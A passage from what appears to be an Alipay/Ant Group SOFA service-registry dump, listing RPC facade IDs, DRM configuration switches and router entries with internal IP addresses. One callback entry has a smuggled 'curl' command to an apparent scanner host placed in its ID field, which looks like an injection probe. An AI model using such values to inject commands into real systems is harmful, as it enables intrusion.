vice.facade.udf.api.IAlphadUdfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.FileBridgeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_${aml_topic}#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicada.common.service.facade.api.service.NativeServiceApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.facade.api.MarketInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.appinfo.IsvAppInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.InsLeadsDeliveryInfoFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:amldata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.mall.DeposerSuccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.redeem.RedeemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.mulSgwRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:bankprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.CustomerServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.biz.activity.service.PlayManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.FunctionWhiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.8.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.ipay.imerchprod.merchant.facade.api.RiskLevelQueryService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbcraftsman@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.plugin.PluginManageService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.zdatabus.common.agent.drm.RefreshClientConfigDRM.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.53.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clearingcenter.facade.api.LiquidateInstructionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.biz.donate.DonateTimeoutManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:secudownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.common.manage.facade.api.template.SceneTemplateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginCredentialServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.CacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.AppPackageAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobilecashier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bluearmyprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingcore.common.service.facade.use.InsMktUseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cardbin.common.service.facade.CardBinValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.EventManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanamountprod.common.service.facade.service.AmountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_STOCKASSETCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AccountDailyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.inspector.api.InspectorConfigurationService:1.0:securitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:operator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.common.service.facade.xphub.XpMerchantBindWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.experience.InsLifeExperienceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tegg.trserver.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.PublishContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkConfigDataMoblieSerice:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.SavingPlanDrmImpl.selectableFundProductIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.gift.api.MiniGiftTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.common.service.facade.fundtrade.FundTradeQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.oauth.OAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.MigrationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.rule.RuleManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.randomRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.turnOnCacheFailover,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financingcore.financing.facade.api.FinancingPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PricemngPriceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderExtInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_YEB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.unknowTypeFinanceExchangeCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.74.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbill.facade.service.PcreditBillLendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqInfluenceNormalizationDrm.weiboInfluenceThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.admin.WorkflowAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundselling:name=com.alipay.financeprod.biz.shared.drm.impl.MessageSwitchConfigDrmImpl.msgSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradecsa.common.service.facade.mutualtask.MutualtaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.alipaypoint.api.AlipayPttransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.riskaction.FundsRiskActionManager:1.0:gap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.mdata.MdataRecoverFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:fininsightmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.core.cpmproduct.repository.FinpwmCmpProductSceneRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.article.facade.BasicArticleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.merchantSelfUidFileContentMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotationcore.common.service.facade.api.stockcode.FqpQcStockCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.interval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobiletms.senior.common.service.facade.api.IterationPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zskynet.zdalExplorerDataSource.groupLabelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:izconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetcore.common.service.profitcore.facade.TestCaculateProfitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoInsCompanyAreaFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopengw.service.facade.OutOpengwSyncCallBack:1.0:ifinflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.229.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.account.MatcherSendMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.177.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paydecision.service.client.facade.AssetTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.littleapp.LittleAppComponentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_SEARCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.discount.core.model.repository.CampRelateSubjectRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.mobileaecSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfinsight_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.usergroup.InsIopUserGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.face.FaceUsableModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:etetestcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.activityOrderLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@pcloanoperation#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.memberprod.common.service.account.register.RegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.quotnearsource.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxconf.service.facade.ctrl.DataSvnCommitService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcTrainTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zimtmsvcprod_reverseApplyOrder_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_GIFT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.biz.coupon.detailload.CouponAdcAccountResource.adcAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.shadowSmartFoEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.alive.ProdALiveRecReasonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.agencyNavigation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PEERPAYPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.DeployGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.task.facade.TaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBFundRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditkit.facade.service.DutyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_FINMODELOPS#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@sdaxconnectplatform#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.40.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundAccompanyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mhcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vmonetaryprod.common.service.facade.VmprodQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PICASSO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.feature.CrowdFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.commonquery.PcreditUserContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitTemplateSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.biz.service.impl.rpc.trade.LifeTradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.price.PriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.integration.einvoice.TaxPremiumTransferIsvServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.LotteryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.service.facade.impl.GacPlatformServiceFacade:1.0:fporgassetswap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.usertransfer.UserTransferLifecycleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_SCxx#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cschannel.common.service.facade.api.prod.mng.RouterConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.newNotifySubscribe,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.api.JsApiQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.levelzero.api.LztransTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OPSORDER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.mission.PcreditActivityCoreMissionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.VerifyFacade:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.UserProtocolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.RemitApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.mng.MerchantRoleMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.portfolioCodeIgnoreCheckBeforeSave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcateringprod.common.service.facade.ordersetting.api.OrderSettingToTaoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miadsp.common.service.facade.MiadspChannelInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.CashingInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizinsight.common.service.facade.crowd.CrowdAnalysisTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.spi.OrderRemindProcessCallback:1.0:koubei-box@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.databus.RefreshDatabusClientConfigService:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtbank.facade.activity.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-Antcalendar-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:pcreditdecision.demo.product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.FaviconOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_mp_rule_white_remove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.zcbprod.ZCBAssetServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoguard.common.service.facade.promobench.verify.api.PrizeVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetkeeper.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundFixedDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.BizProductCfgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.landlordgame.facade.api.PlayerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebillcenter.common.service.facade.EbillUserOperationLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_custview_transaction_resume#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:curl http://33024869-uniqueId-104003020.antscanner.global.alipay.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.facade.change.ChangePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custcenter.service.facade.sequence.SequenceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:prodtransquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.fininfo_pcconfigwrite_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.admin.ChangeCoreAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdssp.service.UploadSFSFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.backend.api.TmallItemSyncFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dqm.compliance.ComplianceAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zfundcheck.common.service.facade.CoverageInfoServiceFacade:1.0:alipayService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.BgmirrorUrllibManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityShopOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.tddl.v1_psbpmedicalapp.dbweight#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.a